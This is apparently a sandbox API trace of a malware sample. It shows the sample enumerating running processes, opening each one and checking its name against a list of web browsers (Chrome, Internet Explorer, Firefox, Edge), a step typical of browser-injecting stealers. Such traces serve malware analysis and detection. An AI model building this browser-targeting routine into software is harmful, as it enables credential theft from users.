	[0212.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0212.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3de0
	[0212.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.571] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0212.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.571] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.572] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0212.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.572] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.572] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3de4
	[0212.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.573] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.574] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.574] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.575] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.575] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0212.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3de8
	[0212.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.576] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.576] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.577] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.577] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.577] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3dec
	[0212.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.578] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.579] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.579] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.580] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.580] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3df0
	[0212.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.581] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.582] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.582] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.583] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.583] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0212.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3df4
	[0212.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.584] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0212.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.585] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.585] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0212.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.586] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0212.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3df8
	[0212.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.587] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0212.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.588] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.588] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0212.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.589] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0212.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3dfc
	[0212.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.590] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.591] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.591] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.591] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.591] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0212.592] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3e00
	[0212.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.593] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0212.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.593] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.594] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0212.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.594] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.594] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0212.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0212.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0212.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3e04
	[0212.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.597] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0212.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.598] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.599] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0212.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.600] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.601] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0212.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3e08
	[0212.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.602] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0212.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.602] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.602] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0212.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.603] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.603] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0212.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3e0c
	[0212.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.604] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0212.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.605] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.605] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0212.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.606] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.606] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0212.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3e10
	[0212.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.607] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0212.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.608] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.608] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0212.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.609] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.609] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0212.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3e14
	[0212.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.610] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0212.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.611] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.612] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0212.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.613] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.625] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0212.626] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3e18
	[0212.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.626] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0212.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.626] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.626] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0212.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.627] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.627] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0212.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3e1c
	[0212.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.628] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0212.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.629] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.630] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0212.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.631] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.631] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0212.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3e20
	[0212.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.632] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0212.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.633] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.634] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0212.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.634] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.635] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0212.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3e24
	[0212.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.636] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0212.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.636] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.637] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0212.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.637] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.637] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0212.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3e28
	[0212.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.639] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0212.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.639] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.639] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0212.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.640] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.640] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0212.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3e2c
	[0212.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.641] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0212.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.642] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.643] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0212.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.643] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.644] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0212.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3e30
	[0212.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.645] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0212.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.646] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.647] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0212.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.648] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.649] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0212.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3e34
	[0212.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.651] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0212.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.653] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.654] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0212.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.655] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.656] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0212.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3e38
	[0212.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.659] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0212.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.662] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.664] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0212.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.665] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.666] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0212.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3e3c
	[0212.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.667] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0212.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.668] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.668] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0212.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.668] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
